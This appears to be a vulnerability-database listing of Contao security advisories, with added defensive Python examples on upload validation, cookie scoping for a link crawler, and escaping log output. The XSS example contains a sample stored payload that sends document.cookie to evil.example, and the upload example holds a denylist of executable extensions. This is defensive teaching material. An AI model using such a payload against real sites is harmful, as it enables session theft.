11 matches found
CVE-2019-19712
Contao 4.0 through 4.8.5 has Insecure Permissions. Back end users can manipulate the details view URL to show pages and articles that have not been enabled for them...
Unrestricted Upload Of File With Dangerous Type
Contao is vulnerable to Unrestricted Upload of File with Dangerous Type. The vulnerability is caused due to a lack of proper validation and security controls in the file upload functionality, allowing malicious users to upload and execute harmful files on the server, which may lead to Remote Code...
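The entry above describes the generic failure: an upload handler that trusts the client-supplied file name and type. The following is an added example (not Contao's upload code, and not taken from the advisory) of the server-side check a practitioner would expect in front of any upload handler on a PHP host: an extension allowlist, a hard denylist of extensions a web server may hand to the PHP interpreter applied to every extension in the name (so `shell.php.jpg` is rejected), a content sniff that must agree with the extension, and rejection of path components in the name. The allowlist, magic-byte table and `<?php` check are assumptions chosen for illustration.

```python
from pathlib import PurePosixPath

# Assumed allowlist for this example; a real deployment derives it from configuration.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Extensions that common Apache/nginx PHP setups execute. Rejected wherever they
# appear in the name, not only as the last suffix ("shell.php.jpg").
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "htaccess"}

# Constructed magic-byte table for the binary types in the allowlist.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF-": "pdf",
}
BINARY_TYPES = {"jpg", "jpeg", "png", "gif", "pdf"}


def sniff_type(data: bytes):
    """Return the type implied by the leading bytes, or None if unrecognised."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason_or_extension) for a client-supplied name and body."""
    name = PurePosixPath(filename).name
    # Any directory component, or a bare/dot name, is rejected outright.
    if name != filename or name in ("", ".", ".."):
        return False, "path components in filename"

    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]

    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, "executable extension"

    ext = exts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"

    # The body must look like what the name claims; a PHP payload named photo.jpg
    # has no JPEG header and is refused here.
    if ext in BINARY_TYPES:
        sniffed = sniff_type(data)
        same = sniffed == ext or (sniffed == "jpg" and ext == "jpeg")
        if not same:
            return False, "content does not match extension"
    elif ext == "txt" and b"<?php" in data.lower():
        return False, "PHP open tag in text file"

    return True, ext
```

Even with this check in place, the upload directory should be served with script execution disabled, so that a validation bypass does not become code execution.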
Contao: Possible cookie sharing with external domains while checking protected pages for broken links
Impact: If the crawler is set to crawl protected pages, it sends the Cookie header to external URLs. Patches: Update to Contao 4.13.40 or 5.3.4. Workarounds: Disable crawling protected pages. References: https://contao.org/en/security-advisories/session-cookie-disclosure-in-the-crawler For more...
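The advisory above is a cookie-scoping bug: a link checker that logs in to reach protected pages carries that session to every link it follows, including third-party hosts. The following is an added example, not Contao's crawler code, of the weak behaviour beside the scoped version a practitioner would want: the session cookie is attached only when the link's scheme is http(s) and its host is exactly the crawled site's host. `SITE_HOST`, `SESSION_COOKIE` and the link list are constructed for the example.

```python
from urllib.parse import urlsplit

SITE_HOST = "www.example.com"                 # assumed host of the crawled site
SESSION_COOKIE = "PHPSESSID=0123456789abcdef"  # constructed session cookie value

# Constructed links as they might appear on a protected page.
LINKS = [
    "https://www.example.com/members/downloads",
    "http://www.example.com/news",
    "https://cdn.example.net/lib.js",
    "https://www.example.com.evil.example/",     # host-suffix lookalike
    "https://www.example.com@evil.example/",      # userinfo trick: host is evil.example
    "mailto:webmaster@example.com",
]


def cookie_header_unscoped(url: str, cookie: str) -> dict:
    """The behaviour the advisory describes: the cookie goes to every URL."""
    return {"Cookie": cookie}


def cookie_header_scoped(url: str, cookie: str, site_host: str) -> dict:
    """Attach the session cookie only to http(s) requests for the site's own host."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return {}
    # urlsplit().hostname strips userinfo and port, so "a@b" resolves to host b.
    host = (parts.hostname or "").lower()
    if host != site_host.lower():
        return {}
    return {"Cookie": cookie}


def headers_for_links(links, cookie=SESSION_COOKIE, site_host=SITE_HOST) -> dict:
    """Map each link to the headers the scoped crawler would send for it."""
    return {url: cookie_header_scoped(url, cookie, site_host) for url in links}


def leaked_to(links, cookie=SESSION_COOKIE, site_host=SITE_HOST) -> list:
    """Links that would have received the cookie under the unscoped behaviour but not the scoped one."""
    return [
        url for url in links
        if cookie_header_unscoped(url, cookie) and not cookie_header_scoped(url, cookie, site_host)
    ]
```

Exact host comparison is deliberate: a suffix check (`endswith("example.com")`) would still leak to `www.example.com.evil.example`, and the userinfo form `https://www.example.com@evil.example/` only looks like the site's host to a regex on the raw string.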
Cross site scripting via canonical URL
More info at https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html...
CVE-2021-35210
Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end...
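The entry above is stored XSS through a log table: a value that an unprivileged or unauthenticated request can get written to the log (for example the username of a failed login) is later rendered into the back-end log view as markup. The following is an added example, not Contao's log viewer, that shows the unsafe rendering beside output encoding of every field at render time. The table rows and field names are constructed for the example.

```python
import html

# Constructed log rows, including one whose username field carries a payload
# that a failed-login handler would have stored verbatim.
LOG_ROWS = [
    {"tstamp": "2021-06-01 10:00:00", "username": "admin", "text": "Login successful"},
    {
        "tstamp": "2021-06-01 10:05:00",
        "username": "<script>new Image().src='https://evil.example/?c='+document.cookie</script>",
        "text": "Invalid login attempt",
    },
]
COLUMNS = ("tstamp", "username", "text")


def log_event(rows, username: str, text: str, tstamp: str) -> None:
    """Store an event as received; storing raw input is fine, rendering it raw is not."""
    rows.append({"tstamp": tstamp, "username": username, "text": text})


def render_log_unsafe(rows) -> str:
    """Raw interpolation: a stored string becomes HTML in the admin's browser."""
    return "".join(
        "<tr>" + "".join(f"<td>{row[col]}</td>" for col in COLUMNS) + "</tr>"
        for row in rows
    )


def render_log_safe(rows) -> str:
    """Encode every field on output; the payload is displayed, not executed."""
    return "".join(
        "<tr>" + "".join(f"<td>{html.escape(str(row[col]), quote=True)}</td>" for col in COLUMNS) + "</tr>"
        for row in rows
    )


def contains_raw_markup(rendered: str) -> bool:
    """Cheap check used by the test: does a script tag survive into the output unencoded?"""
    return "<script" in rendered.lower()
```

Encoding at render time rather than sanitising at write time is the choice that holds up: the log keeps the exact string that was received, which is what an incident responder wants to see, and every viewer of that string encodes for its own context.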
SQL injection
Contao prior to 2.11.4 has a SQL injection vulnerability...
Cross-site scripting (XSS) vulnerability in the system log of the back end
More info at https://contao.org/en/news/contao-3535.html...
PHP object injection vulnerability allows for arbitrary code execution
More info at https://contao.org/en/news/major-security-hole-found-in-contao.html...
PHP file inclusion via insert tags
More info at https://contao.org/en/security-advisories/php-file-inclusion-via-insert-tags.html...
PHP file inclusion via insert tags
More info at https://contao.org/en/security-advisories/php-file-inclusion-via-insert-tags.html...
Insert tag injection in front end forms
More info at https://contao.org/en/security-advisories/insert-tag-injection-in-forms.html...